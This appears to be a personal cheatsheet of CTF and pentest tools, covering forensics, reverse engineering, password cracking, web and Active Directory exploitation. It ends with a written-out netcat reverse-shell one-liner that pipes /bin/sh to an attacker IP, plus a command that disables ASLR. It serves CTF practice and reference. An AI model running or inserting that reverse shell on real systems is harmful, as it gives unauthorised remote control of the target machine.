CTF and Pentest tools cheatsheet

I'll try to keep here all the fantastic stuff I discover and use during CTFs for ease of reference.

Privesc

Manipulate pcap and pcapng files with Python

  • Scapy : Very powerful but steep learning curve, can be used for both static analysis and realtime packet manipulation.
  • dpkt : Quick setup and fast but not many features, accessing nested packet contents can be cumbersome.
  • pyshark : Python wrapper for tshark, which allows the use of Wireshark Dissectors.
  • pypacker : Built on top of dpkt, fast as well but doesn’t do anything the others don’t.

Bruteforce web app subdomains, files and directories

  • gobuster : Written in Go, can also find host names.
  • dirb : Kali’s version
  • dirbuster : OWASP’s version (can also bruteforce letter by letter)
  • afl++ : Not a bruteforce tool but an awesome fuzzer

Exploitation

Package management

  • FPM : Easy and fast method to create and tweak packages for a huge variety of systems
  • Poetry : An elegant Python package creator and manager

Password crackers

  • john : Does it really need an introduction?
  • hydra : My personal preference
  • fcrackzip : A cool tool but hydra is usually faster

Cryptography

  • SageMath : Mathematical computation with a Python API
  • z3 : Theorem prover from Microsoft, has Python, C and C++ APIs
  • Alpertron : Easily factorize big integers online
  • RsaCtfTools : Accounts for 95% of my flags in the crypto category

Webhooks and HTTP requests

  • RequestBin : Online HTTP/Webhook requests collector when whipping up a full-fledged C2 would be overkill.

GDB enhancements

  • GEF : Single file and fast.
  • PwnDBG : Setup is quite cumbersome when in a hurry but there’s a boatload of features and extensions available.
  • peda : Single file with a lib folder, quite easy to c/p on a remote target when needed. Not actively maintained but still working very well.

Online services

  • CyberChef : Great and intuitive UI for manipulating data, files and ciphers. All online but can be run locally if needed.
  • ngrok : Expose your LAN to the outside for quick C2 or file serving.

Forensics

  • Wireshark : The uncontested king of packet analysis
  • A really complete cheatsheet
  • Photorec : Recovers 180+ file types from a disk
  • Binwalk : Extract firmware images and files
  • Sleuthkit : Collection of utilities for FS analysis.
  • Autopsy : Graphical interface for the sleuth kit.
  • Bulk Extractor : Extract whatever you can from an image. Not so subtle, but oh so efficient.
  • Volatility : The best tool to analyze memory dumps. Sometimes finicky, will need some plugins to give its all.
    • Dwarf2json : Must-have for Vol3 users to generate a profile for the target system

Other awesome Python packages and scripts

  • Pwntools : Awesome utils and functions for all matters of binary exploitation.
  • DNSsteal : Fake DNS server for data exfiltration through DNS requests
  • pspy : Monitor system processes without root access

Reverse engineering

  • Ghidra : The NSA decompiler/disassembler
  • Cutter : FOSS wrapper for Rizin
    • Good decompiler with the r2ghidra plugin
  • radare2 : Super powerful but cryptic as fuck
    • Also benefits from r2ghidra
  • ghex : A nice hex editor for Gnome/Mate DE
  • Blukat : Get libc version for building ROPs

Automated tools

  • nmap : The one and only
  • WPscan : When you’re willing to shoot the ambulance
  • SQLmap : Because no one wants to do it by hand

Windows / Active Directory tools

  • mimikatz : Exploitation and post-exploitation made easy
  • Evil-WinRM : An incredible remote shell (provided you pwned the system already, of course)
  • impacket : Not specifically Windows-oriented but can be used to communicate with almost all protocols MS uses
  • SMBmap : Enumerate Samba shares across an entire domain
  • SMBclient : For when SMBmap finishes
  • Bloodhound : Find unintended relationships to exploit in an AD environment

Web exploitation

  • Burp Suite : The best proxy around for Web exploits
  • Owasp ZAP : A good contender to Burp
  • Nikto2 : Automated and comprehensive web scanner
  • BeEF framework : Complete control over an unlucky browser

OS

  • Kali Linux : Industry standard.
  • Parrot OS : Also Debian based, it’s my favorite atm. A bit less lightweight but really stylish and with the same quality of tools.
  • BlackArch : My friend (who uses Arch, btw) only swears by it. Didn’t try by myself, though.
  • FlareVM : From FireEye, godlike for Windows malware analysis

Useful bash commands

Netcat reverse shell without -e argument (from reverse shell cheatsheet)

  • From attacker : nc -nlvp 4567
  • From target : rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.0.12 4567 > /tmp/f

Start a shell without ASLR if you don’t wanna mess with /proc/sys/kernel/randomize_va_space

setarch `uname -m` -R /bin/bash
